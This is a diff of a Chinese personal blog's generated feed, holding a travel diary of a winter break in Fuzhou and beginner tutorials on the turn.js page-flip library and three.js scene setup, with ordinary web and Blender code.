    ​ 面积比市图小很多,内部设施却比市图好很多的省图。

    2.19 西湖公园

    福泽绵长

    ​ 本来想去省博的,结果一看手机发现是星期一🙄,寄!

    五福临门

    ​ 西湖公园怪石前的可爱小龙龙。

    西湖

    ​ 拍的时候觉得还蛮漂亮的,写的时候已经去了杭州西湖就觉得不漂亮了🤧。

    2.20 保定

    福建保定

    ​ 临走前得去一下著名景点——保定巷!

    2.21 END

    再见

    ​ 最早也得 7.14 以后再见了!



    ]]>
    + .article-container {overflow-x: unset;}

    前言

    • 这篇博客是记录 1.21 - 2.21 在福州躺平的生活🫣!
    • 整了一个很牛逼的东东——turn.js🤤!

    正文

    寒假开始锣😍!

    ​ 寒假头几天福州疯狂降温😶‍🌫️!

    日出金山

    ​ 偷一张小小怪在师大拍的日出金山,福州难得下了雪!虽然市区 p 也没有😇。

    1.25 乌山

    寻梦闽都

    ​ 花花绿绿的寻梦闽都,把通向黎明湖的隧道霸占了😠!

    1.26 温泉公园

    晋安河

    ​ 家门口通了很方便的 4 号线😍!这样可以每天坐地铁去环境最好的省图了!

    ​ 印象中很久没有去省图旁边的温泉公园了。

    1.30 晋安湖

    晋安湖

    ​ 晋安湖公园几乎已经修缮完成。

    ​ 福州的晴天,天空真的很蓝😍。

    晋安之眼

    ​ 看着很漂亮,却不能坐的晋安之眼😅。

    2.1 福建师范大学

    师大美院旧址

    ​ 父母曾经读书的地方🤔,漂亮的小洋楼。

    雕塑

    ​ 教学楼前的雕塑。

    苏式建筑

    ​ bb 说是苏式建筑。

    2.3 三坊七巷

    南后街

    ​ 之前的暑假都懒得去的地方,这个寒假不知道去了多少次🤪,每天都人气火爆。

    2.6 烟台山

    仓山影剧院

    ​ 偷跑去烟台山公园玩。

    石厝教堂

    ​ 网红地标——石厝教堂!不过我觉得这个教堂并不是很好看,矮矮扁扁的🤔。

    福州时代中学

    ​ 时代中学最后一届学生的最后一个学期就要到了,这会不会是我最后一次见到这个招牌呢?

    2.7 南公园

    南公园
    南公园 南公园 南公园

    ​ 打着去大利嘉城整散热硅胶的幌子去南公园玩🫢。

    除夕-春节 青年广场

    青年广场

    ​ 中洲岛又要放烟花了!今年索性连春晚都没看了。

    ​ 青年广场布满了围挡差评☹️!估计是政府怕发生踩踏事故,结果造成了很大的不便。

    无人机

    ​ 风里雨里终于等到了零点!无人机启动!

    福

    ​ 2024——福州年,最有福。

    🍺

    ​ 干杯!

    ❤

    ​ 我爱虎纠!

    🐉

    ​ 龙年大吉!

    还挺厉害的

    ​ 去年福州拿了一个看上去很牛逼其实没啥卵用的奖项——全球可持续发展城市🥱。

    大疯狂

    ​ 最后一阵乱喷。

    ​ 为了保证网页浏览速度,只能压缩出这么一小段烟花。

    2.11 旗山湖

    旗山湖

    ​ 偷跑去晋安湖的好朋友——旗山湖!

    2.12 梁厝

    ​ 看小红书说梁厝是个不错的地方,还可以地铁直达,去闯闯😍。

    艺术中心

    ​ 梁厝旁边有点掉色的艺术中心。

    梁厝

    ​ 在外面呆久了,才能注意到这种建筑真的很有福州特色。

    🐘

    ​ 梁厝里最大的厝!前面有个大围挡差评!

    可爱小蜜蜂

    ​ 南方春来早。采蜜的蜜蜂。

    游神 游神 游神

    ​ 今年福州拿出了游神我这个假福州人从来没有听说过的东西🤧,看得出福州也在很努力地宣传旅游资源。

    古与今

    ​ 古今同框,这个“古”挺新,这个“今”反倒有点旧🥸。

    这个地方真是太好玩了!

    ​ 返程途中又去了著名景点三坊七巷😇,人居多。

    ​ 这段时间可以看到很多外地的车牌,浙 B 的尤其多。

    2.14 金鸡山公园

    金鸡山公园

    ​ 从图书馆出来走彩虹桥结果给我直接送山顶去了🤧。

    2.15 福州市博物馆

    律师函⚠

    ​ 理着中分头的市博。

    古吴神韵

    ​ 吴越地区是中华文明的重要起源地之一,是中国东部长江下游的古代文明中心。吴越文化与长江中游的楚文化和长江上游的巴蜀文化并称为长江流域古代三大文明。吴是周人和江南土著民族结合而形成的诸侯国,商晚周初在太伯、仲雍创建勾吴时一方面“端委,以治周礼”;另一方面又随乡入俗,“断发文身”。所以吴国文化是由华夏文化和土著“荆蛮人”文化相融合形成的区域性文化,始终保持着鲜明的地方特征。
    本展览撷取镇江博物馆藏吴文化青铜精品 56 件(套),从一个侧面揭示吴文化的区域特征,相信会给大家带来别样的感受。

    市博 市博 市博

    ​ 先是跟福州毫不搭嘎的展览——镇江青铜文物展!

    镂云裁月 妙笔神针——吉林地区满族绣品展

    ​ 满族刺绣作为满族民族文化的重要载体,以针代笔,以线代盟,是满族先民审美与智慧的结晶也是满汉文化相互交融的历史见证。
    ​ 吉林是满族聚居地之一,清代曾在这里设立打牲鸟拉总管衙门,负贵为皇室采捕贡品。吉林满族绣品,具有强烈的民族及地域特色,造型夸张粗犷,色彩凝重艳丽,冷暖对比强烈,构图饱满对称绣工精美绝伦。其作品主要有枕头顶、荷包、幔帘、幔帐、围裙等。题材内容,既有生产生活因素,又有文化传承关系,尤其是萨满文化主题。
    ​ 本次展出的作品,多来自打牲乌拉总管衙门辖地的伊通和九台地区,时代跨度从清代到民国,以代表满族民间刺绣精华的“枕头顶绣"和“幔帐套绣”为主,堪称传统艺术瑰宝。

    市博 市博 市博

    ​ 然后是跟福州毫不搭嘎的展览——吉林满族刺绣展!

    市博

    ​ 福州古地图,根本认不出来😅。

    市博 市博 市博

    ​ 然后是跟福州搭嘎的展览——“碗礁一号”沉船出水瓷器展!只是江西的瓷器到福州出海的时候沉船了,就算是福州的了🤔。

    市博 市博 市博

    ​ 然后是跟福州非常搭嘎的展览——闽都华章!陶陶罐罐,佛像泥人。

    青铜器

    ​ 商代的福州居然能出现这么牛逼的青铜器?!

    2.16 台江

    文化宫

    ​ 寒假就快结束了!想走之前再约个球,去文化宫踩点。好消息是这段时间文化宫球场免费,坏消息是因为球场免费导致占不到场地😇。

    上下杭

    ​ 人挤人的上下杭,拥挤状况就比三坊七巷好一丢丢。

    老房子

    ​ 还有一点租界的痕迹。

    long 华富贵

    ​ 福建特产——龙华富贵!

    WAIYA

    ​ 只要几个福字就能成为非常网红的小街。

    ❤

    ​ 打卡网红大字。

    厝与教堂

    ​ 中外同框。

    茉莉大街

    ​ 没有一朵茉莉花的大街。

    万寿桥

    ​ 框框里的解放大桥。

    口号

    ​ 普通话不标准,让故乡更亲近😇!

    2.17 康桥里

    ​ 超人大炮从湖南回来了,或许是最后一次在福州见到他?这也将是我离开福州前的最后一个周末了,跟大炮哥和保罗约个球,那早上就跟保罗看了个《飞驰人生 2》,我觉得还不错,保罗说一般般🧐。

    康桥里

    ​ 看电影前在电影院外的投篮机打发时间,被保罗吊打😵。

    炒菜

    ​ 体验一下保罗的工作餐。

    花灯

    ​ 打完球吃完饭随便走了走金鸡山公园。

    瀑布

    ​ 金鸡山公园的瀑布好久没见到了,保罗说一直都有瀑布的🫣。

    2.18 省图

    省图

    ​ 要走之前再记录下省图吧!

    中国梦

    ​ 面积比市图小很多,内部设施却比市图好很多的省图。

    2.19 西湖公园

    福泽绵长

    ​ 本来想去省博的,结果一看手机发现是星期一🙄,寄!

    五福临门

    ​ 西湖公园怪石前的可爱小龙龙。

    西湖

    ​ 拍的时候觉得还蛮漂亮的,写的时候已经去了杭州西湖就觉得不漂亮了🤧。

    2.20 保定

    福建保定

    ​ 临走前得去一下著名景点——保定巷!

    2.21 END

    再见

    ​ 最早也得 7.14 以后再见了!



    ]]>
    @@ -3165,7 +3165,7 @@ /posts/Web-turn.js/ - #magazine{margin: 1em auto;}#magazine div{background-size:cover;}#magazine .turn-page{background-color:#fff;background-size:100% 100%;}

    资源

    快速开始

    Turn.js is a JavaScript library that will make your content look like a real book or magazine using all the advantages of HTML5. The web is getting beautiful with new user interfaces based in HTML5; turn.js is the best fit for a magazine, book or catalog based in HTML5.

    ​ 先实现一个简单的:

    ​ 从 Turn.js: The page flip effect in HTML5 (turnjs.com) 里下载源码和示例。

    ​ 官方示例似乎考虑到了不兼容 HTML5 的情况,我们就简化点,直接使用 turn.min.js(还应导入 JQuery,不过这个博客主题自带,就不需要引入):

    <script type="text/javascript" src="/js/turn.min.js"></script>

    ​ 接下来创建一个电子书:

    #magazine{
    margin: 1em auto;
    }
    #magazine div{
    background-size:cover;
    }
    #magazine .turn-page{
    background-color:#fff;
    background-size:100% 100%;
    }

    ​ 一个 <div></div> 代表一页。

    <div id="magazine">
    <div style="background-image:url(pages/01.jpg);"></div>
    <div style="background: #ccc;">Hello World!</div>
    <div style="background-image:url(pages/02.jpg);"></div>
    <div style="background-image:url(pages/03.jpg);"></div>
    <div style="background-image:url(pages/04.jpg);"></div>
    <div style="background-image:url(pages/05.jpg);"></div>
    <div style="background-image:url(pages/06.jpg);"></div>
    <div style="background: #ccc;">Hello World!</div>
    </div>
    • $(document).ready(function () { 设置电子书的宽高,宽度为 95%,高度随宽度而定,比例 752 / 1152 是根据电子书图片的宽高($576\times752$)计算得到。
    • $(window).ready(function () {} 设置电子书的属性:
      • display: double 双页电子书。
      • 其它默认。
    • $(window).bind('keydown', function (e) {} 设置按钮监听,按下键盘左键和右键时翻页。
    $(document).ready(function () {
    // 获取容器元素
    var container = $('#magazine');
    // 设置容器宽度
    container.css('width', '95%');
    // 计算高度
    var width = container.width(); // 获取容器的实际宽度
    var height = (752 / 1152) * width; // 根据比例计算高度
    // 设置容器高度
    container.css('height', height + 'px'); // 将高度值赋给容器的高度属性
    });

    $(window).ready(function () {
    $('#magazine').turn({
    display: 'double',
    acceleration: true,
    gradients: !$.isTouch,
    elevation: 50,
    when: {
    turned: function (e, page) {
    /*console.log('Current view: ', $(this).turn('view'));*/
    }
    }
    });
    });

    $(window).bind('keydown', function (e) {
    if (e.keyCode == 37)
    $('#magazine').turn('previous');
    else if (e.keyCode == 39)
    $('#magazine').turn('next');
    });

    ​ 最终效果:

    Hello World!
    Hello World!
    ]]>
    + #magazine{margin: 1em auto;}#magazine div{background-size:cover;}#magazine .turn-page{background-color:#fff;background-size:100% 100%;}

    资源

    快速开始

    Turn.js is a JavaScript library that will make your content look like a real book or magazine using all the advantages of HTML5. The web is getting beautiful with new user interfaces based in HTML5; turn.js is the best fit for a magazine, book or catalog based in HTML5.

    ​ 先实现一个简单的:

    ​ 从 Turn.js: The page flip effect in HTML5 (turnjs.com) 里下载源码和示例。

    ​ 官方示例似乎考虑到了不兼容 HTML5 的情况,我们就简化点,直接使用 turn.min.js(还应导入 JQuery,不过这个博客主题自带,就不需要引入):

    1
    <script type="text/javascript" src="/js/turn.min.js"></script>

    ​ 接下来创建一个电子书:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    #magazine{
    margin: 1em auto;
    }
    #magazine div{
    background-size:cover;
    }
    #magazine .turn-page{
    background-color:#fff;
    background-size:100% 100%;
    }

    ​ 一个 <div></div> 代表一页。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    <div id="magazine">
    <div style="background-image:url(pages/01.jpg);"></div>
    <div style="background: #ccc;">Hello World!</div>
    <div style="background-image:url(pages/02.jpg);"></div>
    <div style="background-image:url(pages/03.jpg);"></div>
    <div style="background-image:url(pages/04.jpg);"></div>
    <div style="background-image:url(pages/05.jpg);"></div>
    <div style="background-image:url(pages/06.jpg);"></div>
    <div style="background: #ccc;">Hello World!</div>
    </div>
    • $(document).ready(function () { 设置电子书的宽高,宽度为 95%,高度随宽度而定,比例 752 / 1152 是根据电子书图片的宽高($576\times752$)计算得到。
    • $(window).ready(function () {} 设置电子书的属性:
      • display: double 双页电子书。
      • 其它默认。
    • $(window).bind('keydown', function (e) {} 设置按钮监听,按下键盘左键和右键时翻页。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    $(document).ready(function () {
    // 获取容器元素
    var container = $('#magazine');
    // 设置容器宽度
    container.css('width', '95%');
    // 计算高度
    var width = container.width(); // 获取容器的实际宽度
    var height = (752 / 1152) * width; // 根据比例计算高度
    // 设置容器高度
    container.css('height', height + 'px'); // 将高度值赋给容器的高度属性
    });

    $(window).ready(function () {
    $('#magazine').turn({
    display: 'double',
    acceleration: true,
    gradients: !$.isTouch,
    elevation: 50,
    when: {
    turned: function (e, page) {
    /*console.log('Current view: ', $(this).turn('view'));*/
    }
    }
    });
    });

    $(window).bind('keydown', function (e) {
    if (e.keyCode == 37)
    $('#magazine').turn('previous');
    else if (e.keyCode == 39)
    $('#magazine').turn('next');
    });

    ​ 最终效果:

    Hello World!
    Hello World!
    ]]>
    @@ -3194,7 +3194,7 @@ /posts/Web-ThreeJS/ - 资源

    0

    0.4 GitHub 上的 three.js - 魔法出现的地方

    mrdoob/three.js: JavaScript 3D Library. (github.com) 中:

    • build/three.module.js 是运行所需的文件。
    • examples/ 代码示例。
    • src/ 源代码。

    0.5 如何在你的项目中引入 three.js

    在项目文件夹中,初始化 npm:

    npm init

    安装 three.js:

    npm install --save three

    导入:

    import {XXX, XXX, XXX} from 'three/build/three.module.js';

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js

    要引入的话,直接:

    <script type="module" src="three.module.js"></script>

    1-入门:真正的乐趣从这里开始!

    1.1 Three.js 应用的结构

    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>

    <link href="./styles/main.css" rel="stylesheet" type="text/css">

    <body>
    <div id="scene-container">
    <!-- Our <canvas> will be inserted here -->
    </div>
    </body>

    <script type="module" src="./src/main.js"></script>

    </html>
    body {
    /* remove margins and scroll bars */
    margin: 0;
    overflow: hidden;

    /* style text */
    text-align: center;
    font-size: 12px;
    font-family: Sans-Serif;

    /* color text */
    color: #444;
    }

    h1 {
    /* position the heading */
    position: absolute;
    width: 100%;

    /* make sure that the heading is drawn on top */
    z-index: 1;
    }

    #scene-container {
    /* tell our scene container to take up the full page */
    position: absolute;
    width: 100%;
    height: 100%;

    /* Set the container's background color to the same as the scene's background to prevent flashing on load */
    background-color: skyblue;
    }

    npm 方式导入:

    import {
    Camera,
    Group,
    Scene,
    } from 'three';

    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';
    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    cdn 方式导入:

    import { Camera, Group, Scene } from "https://cdn.skypack.dev/three@0.132.2";
    import { OrbitControls } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/controls/OrbitControls.js?module";
    import { GLTFLoader } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/loaders/GLTFLoader.js?module";

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js,放在vendor/three/build/ 下,本地导入:

    // 导入 Three.js 模块
    import {
    XXX,
    XXX
    } from '../vendor/three/build/three.module.js';

    ...自由操作...

    放置其他人编写的 JS 文件的地方。

    使用的任何非 HTML、CSS 或 JavaScript 的东西都在这里:纹理、3D 模型、字体、声音等等。

    1.2 你的第一个 three.js 场景:你好,立方体!

    编写 main.js

    • 导入模块:
    // 导入 Three.js 模块
    import {
    Scene,
    PerspectiveCamera,
    WebGLRenderer,
    BoxGeometry,
    MeshBasicMaterial,
    Mesh,
    Color
    } from '../vendor/three/build/three.module.js';
    • 获取画布所在容器:
    const container = document.querySelector('#scene-container');
    • 创建一个新的场景:
    const scene = new Scene();
    • 设置背景为天蓝色:
    scene.background = new Color('skyblue');
    • 定义一个透视相机:
      • fov:视野范围
      • aspect:摄影机宽高比(容器的宽高比)
      • near:近裁剪面的距离。只有在这个距离之后的物体才会被摄像机捕捉到,太近的物体会被忽略。这个值应该设置为正数,并且尽可能小以避免裁剪近处的重要细节,但过小的值可能会导致深度缓冲问题。
      • far:远裁剪面的距离。任何在这个距离之外的物体都不会被摄像机捕捉到。这个值决定了摄像机可以看到多远的场景,设置得过大可能会影响渲染性能和深度缓冲的精度。
    • 定义好后,放在场景的 $(0, 0, 10)$ 处。
    const fov = 35; // AKA Field of View
    const aspect = container.clientWidth / container.clientHeight;
    const near = 0.1; // the near clipping plane
    const far = 100; // the far clipping plane

    const camera = new PerspectiveCamera(fov, aspect, near, far);
    camera.position.set(0, 0, 10);
    • 定义一个立方体网格,尺寸设为 $(2, 2, 2)$:
    // 注意这里使用的是 BoxGeometry
    const geometry = new BoxGeometry(2, 2, 2);
    • 定义材质:
    const material = new MeshBasicMaterial({ color: 0x44aa88 });
    • 一个 Mesh 对象——由网格和材质组成:
    const cube = new Mesh(geometry, material);
    • 往场景中添加这个立方体:
    scene.add(cube);
    • 接下来是渲染操作:

      • const renderer = new WebGLRenderer();:创建了一个新的 WebGLRenderer 实例。

        WebGLRenderer 是 Three.js 中用于在网页上渲染 3D 图形的渲染器。它使用 WebGL API 来绘制场景和模型。默认情况下,这个渲染器会创建一个 <canvas> 元素,用于显示渲染的 3D 图形。

        • renderer.setSize(container.clientWidth, container.clientHeight);:使用setSize方法设置渲染器的大小,以适应容器(通常是某个 HTML 元素)的尺寸。

          container.clientWidthcontainer.clientHeight 分别获取容器的宽度和高度,确保渲染的 3D 场景能够充满整个容器,不会出现拉伸或压缩的情况。

        • renderer.setPixelRatio(window.devicePixelRatio);

          通过 setPixelRatio 方法设置渲染器的像素比,使用 window.devicePixelRatio 来适配不同设备的屏幕分辨率。这样可以确保在具有高像素密度的显示屏(如 Retina 屏幕)上也能获得清晰的渲染效果。

        • container.appendChild(renderer.domElement);

          渲染器创建的 <canvas> 元素可以通过 renderer.domElement 访问。这行代码将这个 <canvas> 元素添加到之前指定的 HTML 容器中,使得渲染的 3D 场景能够显示在网页上的该容器内。

        • renderer.render(scene, camera);

          最后,使用 render 方法渲染场景。这个方法接受两个参数:scene(场景)和 camera(摄像机)。场景包含了所有要渲染的 3D 对象,而摄像机定义了观察场景的视角。调用这个方法时,Three.js 会根据提供的场景和摄像机参数,计算并绘制最终的图像到 <canvas> 元素上。

    const renderer = new WebGLRenderer();
    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);

    container.appendChild(renderer.domElement);

    renderer.render(scene, camera);

    演示

    我想,这段代码在 Blender 里的实现:

    import bpy
    import numpy as np

    # 删除默认场景中的所有物体
    bpy.ops.object.select_all(action='SELECT')
    bpy.ops.object.delete(use_global=False)

    # 设置使用 Cycles 渲染引擎,也可以设置为'Eevee'
    bpy.context.scene.render.engine = 'CYCLES'

    # 获取当前世界
    world = bpy.data.worlds['World']
    # 确保使用节点
    world.use_nodes = True
    # 获取节点树和节点
    nodes = world.node_tree.nodes
    # 清除所有现有节点
    nodes.clear()
    # 创建一个新的背景节点
    bg_node = nodes.new(type='ShaderNodeBackground')
    # 设置背景颜色为天蓝色
    bg_node.inputs[0].default_value = (135/255, 206/235, 235/255, 1) # RGBA
    # 创建一个世界输出节点
    world_output_node = nodes.new(type='ShaderNodeOutputWorld')
    # 链接背景节点到世界输出节点
    links = world.node_tree.links
    link = links.new(bg_node.outputs[0], world_output_node.inputs[0])

    # 创建一个立方体
    bpy.ops.mesh.primitive_cube_add(size=2, location=(0, 0, 0))
    # 获取刚刚添加的立方体对象
    cube = bpy.context.object
    # 创建一个新的材质
    mat = bpy.data.materials.new(name="CubeMaterial")
    # 设置材质的基础颜色
    mat.diffuse_color = (68/255, 170/255, 136/255, 1) # RGB + Alpha
    # 将材质分配给立方体
    if not cube.data.materials:
    cube.data.materials.append(mat)
    else:
    cube.data.materials[0] = mat

    # 添加摄像机并直接获取引用
    bpy.ops.object.camera_add(location=(0, 0, 10))
    camera = bpy.context.object # 获取刚刚添加的摄像机对象

    # 设置摄像机的 fov, near 和 far 参数
    camera.data.angle = 35 * (np.pi / 180) # Blender 中使用弧度,Three.js 使用度
    camera.data.clip_start = 0.1
    camera.data.clip_end = 100

    # 摄像机位置已经在添加时设置,这里不需要重复设置
    # camera.location = (0, 0, 10)

    # 设置渲染分辨率
    bpy.context.scene.render.resolution_x = 1848
    bpy.context.scene.render.resolution_y = 1206
    bpy.context.scene.render.resolution_percentage = 100

    Blender

    1.3 介绍世界应用程序

    这章主要是将之前的代码模块化。

    模块化

    获取 container,导入 World.js

    import { World } from './World/world.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // 1. Create an instance of the World app
    const world = new World(container);

    // 2. Render the scene
    world.render();
    }

    // call main to start the app
    main();

    把之前定义摄像机、创建立方体、设置场景环境、渲染器、窗口适应之类的全扔进去。

    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';

    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();

    scene.add(cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    渲染器系统:

    import { WebGLRenderer } from 'three';

    function createRenderer() {
    const renderer = new WebGLRenderer();

    return renderer;
    }

    export { createRenderer };

    场景组件:

    import { Color, Scene } from 'three';

    function createScene() {
    const scene = new Scene();

    scene.background = new Color('skyblue');

    return scene;
    }

    export { createScene };

    相机组件:

    import { PerspectiveCamera } from 'three';

    function createCamera() {
    const camera = new PerspectiveCamera(
    35, // fov = Field Of View
    1, // aspect ratio (dummy value)
    0.1, // near clipping plane
    100, // far clipping plane
    );

    // move the camera back so we can view the scene
    camera.position.set(0, 0, 10);

    return camera;
    }

    export { createCamera };

    立方体组件,它包括创建 几何体、材质和 网格。

    import { BoxBufferGeometry, Mesh, MeshBasicMaterial } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxBufferGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = new MeshBasicMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    return cube;
    }

    export { createCube };

    使得场景可以占据整个窗口的大小:

    class Resizer {
    constructor(container, camera, renderer) {
    // Set the camera's aspect ratio
    camera.aspect = container.clientWidth / container.clientHeight;

    // update the camera's frustum
    camera.updateProjectionMatrix();

    // update the size of the renderer AND the canvas
    renderer.setSize(container.clientWidth, container.clientHeight);

    // set the pixel ratio (for mobile devices)
    renderer.setPixelRatio(window.devicePixelRatio);
    }
    }

    1.4 基于物理的渲染和照明

    three.js 也是使用**基于物理的渲染 (PBR)**的。

    根据之前模块化后的程序,继续修改:

    告诉渲染器启动基于物理的渲染。

    function createRenderer() {
    const renderer = new WebGLRenderer({ antialias: true });

    renderer.physicallyCorrectLights = true;

    return renderer;
    }

    export { createRenderer };

    定义一个灯光:

    • 光强设为 $8$
    • 位置在 $(10, 10, 10)$,照向原点
    import { DirectionalLight } from 'three';

    function createLights() {
    // Create a directional light
    const light = new DirectionalLight('white', 8);

    // move the light right, up, and towards us
    light.position.set(10, 10, 10);

    return light;
    }

    export { createLights };

    scene.add() 里给场景添加光源!

    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    // These variables are module-scoped: we cannot access them
    // from outside the module
    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    演示

    1.5 变换、坐标系和场景图

    emmm 跟 Unity 里差不多吧。

    cube.js 中可以修改 cube 的 positionrotationscale

    import {
    BoxBufferGeometry,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createCube() {
    const geometry = new BoxBufferGeometry(2, 2, 2);

    const material = new MeshStandardMaterial({ color: 'purple' });

    const cube = new Mesh(geometry, material);

    cube.position.x = -0.5;
    cube.position.y = -0.1;
    cube.position.z = 1;

    // equivalent to:
    // cube.position.set(-0.5, -0.1, 1);

    cube.scale.x = 1.25;
    cube.scale.y = 0.25;
    cube.scale.z = 0.5;

    // equivalent to:
    // cube.scale.set(1.25, 0.25, 0.5);

    // to rotate using degrees, they must
    // first be converted to radians
    cube.rotation.x = MathUtils.degToRad(-60);
    cube.rotation.y = MathUtils.degToRad(-45);
    cube.rotation.z = MathUtils.degToRad(60);

    return cube;
    }

    export { createCube };

    还可以把对象放在其他对象中,作其子对象:

    套娃!

    scene.add(mesh);

    // the children array contains the mesh we added
    scene.children; // -> [mesh]

    // now, add a light:
    scene.add(light);

    // the children array now contains both the mesh and the light
    scene.children; // -> [mesh, light];

    // now you can access the mesh and light using array indices
    scene.children[0]; // -> mesh
    scene.children[1]; // -> light

    1.6 使我们的场景具有响应性(以及处理 Jaggies)

    抗锯齿

    renderer.js 中启用抗锯齿:

    const renderer = new WebGLRenderer({ antialias: true });

    无缝处理浏览器窗口大小变化

    修改 resizer.js

    • setSize 封装成一个函数,当用户改变窗口大小(触发 window.addEventListener('resize', () => {});)时,重新 setSize()
    • 定义一个 onResize() 函数,便于引用的时候重写它。
    const setSize = (container, camera, renderer) => {
    camera.aspect = container.clientWidth / container.clientHeight;
    camera.updateProjectionMatrix();

    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);
    };

    class Resizer {
    constructor(container, camera, renderer) {
    // set initial size on load
    setSize(container, camera, renderer);

    window.addEventListener('resize', () => {
    // set the size again if a resize occurs
    setSize(container, camera, renderer);
    // perform any custom actions
    this.onResize();
    });
    }

    onResize() { }
    }

    export { Resizer };

    修改 World.js

    • 重写 onResize() 的逻辑,窗口变换时,重新渲染画面:
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createScene } from './components/scene.js';
    import { createLights } from './components/lights.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/resizer.js';

    let camera;
    let renderer;
    let scene;

    class World {
    constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    resizer.onResize = () => {
    this.render();
    };
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }
    }

    export { World };

    演示

    1.7 动画循环

    创建一个 Loops.js 用于循环:

    • constructor() 构造函数:
      • camera 摄像机。
      • scene 场景。
      • renderer 渲染器。
      • updatables 要在循环中更新的对象的列表。
    • start() 使用 this.renderer.setAnimationLoop(() => {}); 开启循环。
      • this.tick(); 开启计时器。
      • this.renderer.render(this.scene, this.camera); 循环中不断渲染帧。
    • stop() 清空循环:this.renderer.setAnimationLoop(null);
    • tick()
      • const delta = clock.getDelta(); 用于衡量渲染渲染一帧花了多少时间(单位:秒)。
      • 随后调用 this.updatables 里物体的 tick()(类似 Unity 里的 Update())。
    import { Clock } from "three";

    const clock = new Clock();

    class Loop {
    constructor(camera, scene, renderer) {
    this.camera = camera;
    this.scene = scene;
    this.renderer = renderer;
    this.updatables = [];
    }

    start() {
    this.renderer.setAnimationLoop(() => {
    // tell every animated object to tick forward one frame
    this.tick();

    // render a frame
    this.renderer.render(this.scene, this.camera);
    });
    }

    stop() {
    this.renderer.setAnimationLoop(null);
    }

    tick() {
    // only call the getDelta function once per frame!
    const delta = clock.getDelta();

    // console.log(
    // `The last frame rendered in ${delta * 1000} milliseconds`,
    // );

    for (const object of this.updatables) {
    object.tick(delta);
    }
    }
    }

    export { Loop };
    • import { Loop } from './systems/Loop.js'; 导入相应 JS。
    • let loop;loop = new Loop(camera, scene, renderer); 将循环创建为模块作用域变量,如 camerarendererscene 一样,因为我们不希望从 World 类外部访问它。
    • loop.updatables.push(cube);cube 压入 loop.updatables 中,使其可以循环。
    • start()stop() 分别就是 loop 中的 start()stop()
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    渲染的入口改为 world.start();

    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.start();
    }

    main();

    定义 cube.tick:每秒旋转 $30^\circ$。

    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils } from 'three';

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = new MeshStandardMaterial({ color: "purple" });

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

    演示

    1.8 纹理映射

